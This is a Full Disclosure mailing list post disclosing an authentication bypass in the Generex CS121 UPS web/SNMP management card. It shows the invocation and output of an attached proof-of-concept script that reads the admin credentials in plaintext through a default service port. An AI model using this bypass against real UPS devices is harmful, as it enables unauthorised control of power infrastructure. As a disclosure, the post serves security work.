Full Disclosure mailing list archives
UPS Web/SNMP-Manager CS121 authentication bypass, credentials leak, ...
From: jkmac () Safe-mail net
Date: Thu, 15 May 2014 16:25:23 -0400
UPS Web/SNMP-Manager CS121 by Generex comes in with a default enabled "service"-port, that makes it possible to bypass any specified login for HTTP(s), snmp or telnet. CS121 is a widely used management card in ups systems from Legrand, Rittal, Eaton, AEG, Masterguard.... Attached is a poc, found and proofed on Legrand ups with different firmware releases. If you are hardcore enough, you may also flash your own HyNetOS-firmware and take over the world ;-) ./upssearch.pl $IP UPS: <VERSION> CS124-16M32M, ROM-Version: 2.3.4(pduc) - Aug 27, 2010 Target system parameters (current): Default Protocol : TCP/IP Default Driver : Ethernet Mac address : 00-03-05-00-00-00 IP address : XX.XX.XX.XX Net Mask : 255.255.255.192 Default Gateway : XX.XX.XX.XX DHCP : 0.0.0.0 DNS : 0.0.0.0 Port for tools : 4000 Searching login USER: admin, PASS: hg478wegzsu, ACCOUNT: none Regards.
Attachment:
upssearch-pl.txt
Description:
_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- UPS Web/SNMP-Manager CS121 authentication bypass, credentials leak, ... jkmac (May 15)